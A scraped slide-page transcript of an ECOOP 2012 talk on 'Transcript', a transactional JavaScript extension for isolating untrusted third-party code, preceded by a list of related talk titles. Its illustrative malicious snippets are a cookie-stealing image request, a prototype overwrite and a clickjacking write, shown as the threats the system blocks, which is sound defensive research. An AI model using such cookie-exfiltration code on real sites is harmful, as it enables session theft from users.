Enhancing JavaScript with Transactions Mohan Dhawan †, Chung-chieh Shan ‡ and Vinod Ganapathy † † Department of Computer Science, Rutgers University ‡

Slides:

Advertisements

Similar presentations

Widget Summit: Advanced JavaScript Joseph Smarr Plaxo, Inc. October 16, 2007.

Advertisements

Protecting Browser State from Web Privacy Attacks Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell Stanford University.

Presented by Vaibhav Rastogi. Current browsers try to separate host system from Web Websites evolved into web applications Lot of private data on the.

Analyzing Information Flow in JavaScript-based Browser Extensions Mohan Dhawan and Vinod Ganapathy Department of Computer Science Rutgers University 25.

JavaScript FaaDoOEngineers.com FaaDoOEngineers.com.

The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010.

Enforcing Security Policies using Transactional Memory Introspection Vinod Ganapathy Rutgers University Arnar BirgissonMohan Dhawan Ulfar ErlingssonLiviu.

Monitoring Data Structures Using Hardware Transactional Memory Shakeel Butt 1, Vinod Ganapathy 1, Arati Baliga 2 and Mihai Christodorescu 3 1 Rutgers University,

Secure In-VM Monitoring Using Hardware Virtualization Monirul Sharif, Wenke Lee, Weidong Cui, and Andrea Lanzi Presented by Tyler Bletsch.

GATEKEEPER MOSTLY STATIC ENFORCEMENT OF SECURITY AND RELIABILITY PROPERTIES FOR JAVASCRIPT CODE Salvatore Guarnieri & Benjamin Livshits Presented by Michael.

Ensuring Operating System Kernel Integrity with OSck By Owen S. Hofmann Alan M. Dunn Sangman Kim Indrajit Roy Emmett Witchel Kent State University College.

Analyzing Information Flow in JavaScript-based Browser Extensions Mohan Dhawan and Vinod Ganapathy Department of Computer Science Rutgers University.

1 Yinzhi Cao, Zhichun Li *, Vaibhav Rastogi, Yan Chen, and Xitao Wen Labs of Internet Security and Technology Northwestern University * NEC Labs America.

Presented by Vaibhav Rastogi.  Advent of Web 2.0 and Mashups  Inclusion of untrusted third party content a necessity  Need to restrict the functionality.

ConScript Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser Leo Meyerovich UC Berkeley Benjamin Livshits Microsoft.

An Evaluation of the Google Chrome Extension Security Architecture

By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)

Vaibhav Rastogi and Yi Yang.  Web 2.0 – rich applications  A website hosts content it may not be responsible for  Third party gadgets  Third party.

Blackbox Reversing of XSS Filters Alexander Sotirov ekoparty 2008.

The Most Dangerous Code in the Browser Stefan Heule, Devon Rifkin, Alejandro Russo, Deian Stefan Stanford University, Chalmers University of Technology.

Privacy and Security on the Web Part 1. Agenda Questions? Stories? Questions? Stories? IRB: I will review and hopefully send tomorrow. IRB: I will review.

Aaron Blankstein and Michael J. Freedman Princeton University Tuan Tran.

Phu H. Phung Chalmers University of Technology JSTools’ 12 June 13, 2012, Beijing, China Joint work with Lieven Desmet (KU Leuven)

FLOWFOX A WEB BROWSER WITH FLEXIBLE AND PRECISE INFORMATION CONTROL.

AdJail: Practical Enforcement of Confidentiality and Integrity Policies on Web Advertisements Mike Ter Louw, Karthik Thotta Ganesh, V.N. Venkatakrishnan.

Sandboxing JavaScript via Libraries and Wrappers Phu H. Phung University of Gothenburg, Sweden, and University of Illinois at Chicago.

Department of Electrical Engineering and Computer Science CONSCRIPT: Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser.

JavaScript and The Document Object Model MMIS 656 Web Design Technologies Acknowledgements: 1.Notes from David Shrader, NSU GSCIS 2.Some material adapted.

Chapter 6 JavaScript and AJAX. Objectives Explain the purpose and history of JavaScript Describe JavaScript features Explain the event-driven nature of.

Bridges To Computing General Information: This document was created for use in the "Bridges to Computing" project of Brooklyn College. You are invited.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

JavaScript II ECT 270 Robin Burke. Outline JavaScript review Processing Syntax Events and event handling Form validation.

CNIT 133 Interactive Web Pags – JavaScript and AJAX JavaScript Environment.

3-Protecting Systems Dr. John P. Abraham Professor UTPA.

document.location ✗ Location Hijacking Phishing.

Securing Embedded User Interfaces: Android and Beyond Franziska Roesner and Tadayoshi Kohno University of Washington Mohamed Grissa A presentation of USENIX.

ConScript Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser Leo Meyerovich UC Berkeley Benjamin Livshits Microsoft.

Extending HTML CPSC 120 Principles of Computer Science April 9, 2012.

Lecture 3 Process Concepts. What is a Process? A process is the dynamic execution context of an executing program. Several processes may run concurrently,

Module 5: Configuring Internet Explorer and Supporting Applications.

Don't Let Third Parties Slow You Down Arvind Jain, Michael Kleber Google.

Author: Monirul Sharif, Wenke Lee, Weidong Cui, Andrea Lanzi Reportor: Chun-Chih Wu Advisor: Hsing-Kuo Pao Select: CCS09’

Introduction to Client-Side Web Development Introduction to Client-Side programming using JavaScript JavaScript; application examples 10 th February 2005.

JavaScript, jQuery, and Mashups Incorporating JavaScript, jQuery, and other Mashups into existing pages.

Lecture 9: AJAX, Javascript review..  AJAX  Synchronous vs. asynchronous browsing.  Refreshing only “part of a page” from a URL.  Frameworks: Prototype,

C C Implementation  Prototype based on Firefox 3.0b2 codebase/ Spidermonkey VM  Uses SM contexts to manage multiple JavaScript execution contexts simultaneously.

Fall 2006 Florida Atlantic University Department of Computer Science & Engineering COP 4814 – Web Services Dr. Roy Levow Part 2 – Ajax Fundamentals.

1 Javascript DOM Peter Atkinson. 2 Objectives Understand the nature and structure of the DOM Add and remove content from the page Access and change element.

Review of the DOM Node properties and methods Some ways of accessing nodes Appending, copying and removing nodes Event handling – Inline – Scripting –

University of Central Florida The Postman Always Rings Twice: Attacking & Defending postMessage in HTML5 Websites Ankur Verma University of Central Florida,

Vaibhav Rastogi and Yi Yang.  SOP is outdated  Netscape introduced this policy when most content on the Internet was static  Differences amongst different.

Protecting Browsers from Extension Vulnerabilities Paper by: Adam Barth, Adrienne Porter Felt, Prateek Saxena at University of California, Berkeley and.

An Analysis of the Mozilla Jetpack Extension Framework Rezwana Karim, Mohan Dhawan, Vinod Ganapathy Computer Science, Rutgers University Chung-cheih Shan.

Safe browsing - is an ad-blocker extension enough? AIMILIOS TSOUVELEKAKIS IT-DI-CSO IT LIGHTNING TALK – 12/

Web Technologies Lecture 7 Synchronous vs. asynchronous.

Plug-in Architectures Presented by Truc Nguyen. What’s a plug-in? “a type of program that tightly integrates with a larger application to add a special.

Introduction Program File Authorization Security Theorem Active Code Authorization Authorization Logic Implementation considerations Conclusion.

Trevor Jim Nikhil Swamy Michael Hicks Defeating Script Injection Attacks with Browser-Enforced Embedded Policies Jason FroehlichSeptember 24, 2008.

 Web pages originally static  Page is delivered exactly as stored on server  Same information displayed for all users, from all contexts  Dynamic.

Dynamic Parallelization of JavaScript Applications Using an Ultra-lightweight Speculation Mechanism ECE 751, Fall 2015 Peng Liu 1.

Puppetnets: Misusing Web Browsers as a Distributed Attack Infrastructure Paper By : V.T.Lam, S.Antonatos, P.Akritidis, K.G.Anagnostakis Conference : ACM.

JavaScript and Ajax (JavaScript Environment) Week 6 Web site:

Browser code isolation John Mitchell CS 155 Spring 2016.

Open Solutions for a Changing World™ Eddy Kleinjan Copyright 2005, Data Access WordwideNew Techniques for Building Web Applications June 6-9, 2005 Key.

14 A Brief Look at JavaScript and jQuery.

Browser code isolation

TS*: Taming the Un-typed Adversary in JavaScript

[Robert W. Sebesta, “Programming the World Wide Web

Presentation transcript:

Enhancing JavaScript with Transactions Mohan Dhawan †, Chung-chieh Shan ‡ and Vinod Ganapathy † † Department of Computer Science, Rutgers University ‡ School of Informatics and Computing, Indiana University November 24, 2015ECOOP 20121

Problem Web applications include third party content Examples: widgets, advertisements, libraries May contain untrusted, malicious JavaScript November 24, 2015ECOOP 20122

Example from nytimes.com Rogue third party advertisement Displayed image of fake virus scan Client security and privacy at risk November 24, 2015ECOOP 20123

Solution: Transcript Extend JavaScript to support Transactions Execute untrusted content speculatively Commit changes after policy enforcement Transaction Web Application November 24, 2015ECOOP 20124

Goal Protect the Web application from security violating actions of untrusted JavaScript Must handle arbitrary third party code written in JavaScript Including constructs such as eval, this, with. Must enforce powerful security policies Allow pop-ups from white-listed websites only. Dis-allow innerHTML in the context of host Web application. November 24, 2015ECOOP 20125

Contributions JavaScript transactions Speculative execution of unmodified third party JavaScript code Transaction suspend/resume Allow host Web application to mediate external actions like DOM and AJAX operations Speculative DOM updates November 24, 2015ECOOP 20126

Schematic use of Transcript // Web application code var tx = transaction{... // unmodified 3 rd party code... }; // Introspection block goes below /* policy enforcement code */ // validate actions of the transaction tx.commit(); //Rest of the Web application code Transaction Web Application November 24, 2015ECOOP 20127

Example: Untrusted code // Web application code var tx = transaction{ var image = document.createElement("img"); var url = " var params = document.cookie; image.src = url + "?cookie=" + params; document.body.appendChild(image);... Array.prototype.join = function() { return "evilString"; }; }; Transaction Web Application November 24, 2015ECOOP 20128

November 24, tx = transaction {... body.appendChild(image);... }; do {... tx = tx.resume();... } while(tx.isSuspended()); tx.commit(); Web application code … Rest of the Web application Transcript runtime system Introspection block Transcript Runtime 1 DOM TX R/W sets call stack 3 rd party Transaction object tx web app …… 13 Transcript clones the host’s DOM when the transaction starts. DOM orig DOM TX Clone 1 web app call stack 3 rd -party …… 12 web app On a transaction suspend, the Transcript runtime saves all the i) read write sets, ii) speculative DOM, and iii) stack frames till the nearest transaction delimiter to create a Transaction object … call stack 3 rd party 5 DOM TX R/W sets call stack 3 rd party Transaction object tx web app* Transcript runtime loads the saved read write sets and stack frames when the transaction resumes. resume … 4 web app* image + DOM TX DOM’ TX appendChild tx’s write set + Heap orig Heap new DOM’ TX DOM new In the introspection block, the host performs the action (appendChild) on behalf of the guest. November 24, 2015ECOOP 20129

Transaction suspend and resume Transaction Web Application var tx = transaction{... document.body.appendChild(image); }; do{ var rs = tx.getReadSet(), arg = tx.getArgs(); switch(tx.getCause()) { case "appendChild": if (arg[0].nodeName.match("IMG") && !rs.checkMembership(document,"cookie"))‏ obj.appendChild(arg[0]); break; }; /* end switch */ tx = tx.resume(); }while(tx.isSuspended()); if (!(arg[0].nodeName.match("IMG") && rs.checkMembership(document,"cookie"))‏ obj.appendChild(arg[0]); Policy November 24, 2015ECOOP

Read and Write Sets var tx = transaction{... Array.prototype.join = function() { return " evilString " ; }; }; /* Introspection Code */ var ws = tx.getWriteSet(); if(ws.checkMembership(Array.prototype, " * " ) { to_commit = false; } // Rest of the web application code Transaction Web Application var ws = tx.getWriteSet(); if(ws.checkMembership(Array.prototype, "*")){ to_commit = false; } Policy November 24, 2015ECOOP

Gluing var tx = transaction{... document.write(‘<script src= “newcode.js”> ’) ; }; // Introspection block // Rest of the web application code Transaction Web Application November 24, 2015ECOOP

Implementation Prototype implementation in Firefox 3.7a4 Added new JavaScript features transaction keyword and Transaction object Modified SpiderMonkey op-codes to Log all object accesses Suspend on DOM / AJAX calls Added speculative execution support for DOM operations Re-direct all node accesses to the cloned copy November 24, 2015ECOOP

Evaluation Goals Study applicability of Transcript in isolating real guest code Measure performance impact on guest code and microbenchmarks Demonstrate graceful recovery in presence of malicious and buggy guests Methodology Isolated the guest code in a Web application using transactions Introspection block for each transaction enforced a number of general and domain specific policies November 24, November 24, 2015ECOOP

Applicability of Transcript Applied Transcript on five JavaScript widgets and applications Stand-alone and library based No difference in behavior and functionality November 24, BenchmarksPolicies JS MenuNo network or cookie access Picture PuzzleDisallow attaching key event handlers Spell Checker No XMLHttpRequest if cookies were read GreyBox iframes to whitelisted URLs only Color Picker No innerHTML in host’s context November 24, 2015ECOOP

Performance - Application benchmarks November 24, Overhead = 0.16s November 24, 2015ECOOP

Performance – Microbenchmarks (Function calls) November 24, MicroBenchmarkOverhead Native Functions eval(“if (true) true; false;”)6.87x fn.call(this, i)1.89x External Operations getElementById(“checkbox”)6.78x createElement(“div”)3.69x addEventListener(“click”, clk, false)26.51x dispatchEvent(evt)1.20x document.write(“ x = 1; ”)2.01x document.write(“ Hi ”)1.26x November 24, 2015ECOOP

Performance – Microbenchmarks (JavaScript Events) November 24, Average overhead of just 94μs per event. Event nameOverhead NormalizedRaw delay(µs) Drag event ( drag ) 1.71x97 Keyboard event ( keypress ) 1.16x150 Message event ( message ) 1.17x85 Mouse event ( click ) 1.54x86 Mouse event ( mouseover ) 2.05x88 Mutation event ( DOMAttrModified ) 2.14x88 UI Event ( overflow ) 1.97x61 November 24, 2015ECOOP

Recovery Clickjacking November 24, document.write(` Goto Amazon ');... document.write(` Goto Amazon '); November 24, 2015ECOOP

Related Work Staged information flow in JavaScript: PLDI'09 hybrid framework for JavaScript with the aim of protecting Web applications from untrusted code Conscript: S&P'10 aspect-oriented framework to specify and enforce fine- grained security policies for Web applications AdJail: Security'10 isolation mechanism to protect Web application content from malicious advertisements Caja, FBJS, AdSafe, etc. November 24, 2015ECOOP

Conclusion Transcript implements JavaScript transactions to provide isolation and recovery Suspend operations that break isolation Resume operation if web application allows Enforcement of powerful security policies All data reads / writes are recorded Ability to inspect reads / writes before commit No restriction or changes to third party code November 24, 2015ECOOP

Questions ? November 24, 2015ECOOP

Event handler wrapper generation November 24, 2015ECOOP var tx = transaction{... node.addEventListener(“click”, handler, false); }; // Introspection block tx_handler = function(evt) { evt_tx = transaction { handler(evt); } iblock_func(evt_tx); } evt_tx = transaction { handler(evt); } var tx = transaction{... node.addEventListener(“click”, tx_handler, false); }; // Introspection block

A complete example November 24, (function () { var to_commit = true, e = eval; // indirect eval var tx = transaction{e(getFunctionBody(menu)); }; do {... tx = tx.resume(); } while(tx.isSuspended()); if(to_commit) tx.commit(); )(); November 24, 2015 ECOOP